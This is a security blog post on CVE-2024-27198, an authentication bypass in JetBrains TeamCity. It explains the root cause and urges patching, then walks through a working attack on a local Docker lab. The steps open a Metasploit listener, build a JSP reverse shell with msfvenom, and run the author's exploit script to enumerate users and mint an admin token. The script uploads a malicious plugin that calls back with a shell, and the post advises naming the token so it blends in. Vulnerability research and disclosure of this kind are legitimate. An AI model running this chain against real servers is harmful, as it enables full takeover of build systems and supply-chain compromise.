- Published on
TeamCity Authentication Bypass Vulnerability - CVE-2024-27198
- Name
- Chad Wilson
- @NetPenguins
Understanding CVE-2024-27198: A Critical Authentication Bypass Vulnerability
Introduction
CVE-2024-27198 is a severe security flaw with a CVSSv3 score of 9.8, indicating its critical nature. This vulnerability is present in the web component of JetBrains TeamCity and is caused by an alternate path issue, which can be exploited to bypass authentication mechanisms.
Important Note ⚠️
If you are affected by this vulnerability do not delay and patch your instances now. More information about patching can be found at JetBrains Blog
Detailed Exploit Analysis
The vulnerability stems from a weakness in the BaseController class within the web-openapi.jar library of TeamCity. When an API endpoint receives a request appended with .jsp, the BaseController class erroneously allows the request to bypass the standard authentication process. This flaw can be exploited by an attacker to gain unauthorized administrative access to the TeamCity server. [Source]
The Alternate Path Issue
An alternate path issue occurs when software provides an unintended route to a goal that should be protected by authentication. In the case of CVE-2024-27198, the alternate path allows attackers to manipulate the URL to access authenticated endpoints directly, bypassing the login mechanism and gaining full control over the server.
The Impact on TeamCity
Exploiting CVE-2024-27198 grants attackers complete control over all TeamCity projects, builds, agents, and artifacts. This level of access not only compromises the integrity of the server but also opens the door to more extensive supply chain attacks, where the attacker could insert malicious code into software builds.
Setting Up and Executing the Exploit on Kali Linux
To demonstrate the exploit, one can set up a vulnerable TeamCity environment using Docker on Kali Linux:
# Pull a vulnerable TeamCity Server docker image (version: 2023.11.3)
docker pull jetbrains/teamcity-server:2023.11.3
# Run the docker container
docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
Navigate to http://localhost:8111 and complete the setup steps to finish server setup.
Prepare the listener
In a separate terminal window open a listener:
# Open a listener in metasploit
msfconsole -q -x "use multi/handler; set payload java/jsp_shell_reverse_tcp; set lhost eth0; set lport 8088; exploit"
Execute! Execute! Execute! 💥
After the server and listener are running, the exploit can be executed using the provided Python script.
Let's think about this realistically for a moment. The vulnerability allows us to bypass authentication and execute functionality via available JSPs. With that in mind, let's approach this from a stealth engagement perspective. We should first list the users on the server, obtain the userID we are interested in (preferably an admin), and then create a token for the admin with a realistic name (such as cicdconnector).
It would be a safe assumption that an admin user likely exists at
userid=1but it is good practice to check.
So let's do that now! In a terminal run the following:
# Clone the exploit repository
git clone https://github.com/NetPenguins/CVE-2024-27198-RCE
cd CVE-2024-27198-RCE
# Create a jsp shell, I like to use https://www.revshells.com to do basic and quick executions like this.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=eth0 LPORT=8088 -f raw -o shell.jsp
# Execute the exploit script gathering all users
python CVE-2024-27198-RCE.py -t http://localhost:8111 -g
# User the userid you found to complete the exploit into RCE
python CVE-2024-27198-RCE.py -t http://localhost:8111 -i 1 -f shell.jsp -e -n cicdconnection
This script will create a new access token named cicdconnection using the user ID we pass in.
Then it will create a plugin .zip using the shell.jsp we generated previously and upload + activate the plugin.
Lastly, it will launch the malicious JSP using the user's token, opening a connection to the established listener.
In this way, we are able to leverage a user that already exists and generate an access token that looks like a plausible token this user might have generated.
The only thing that stands out at this point (excluding the noise we are likely making on the network) is the addition of an external plugin inside the TeamCity server.
Conclusion
CVE-2024-27198 is a critical vulnerability that requires immediate attention from administrators of TeamCity On-Premises installations. The alternate path issue at the heart of this vulnerability highlights the importance of thorough security practices in software development and the necessity of regular updates and patches. If you are affected by this vulnerability do not delay and patch your instances NOW JetBrains Blog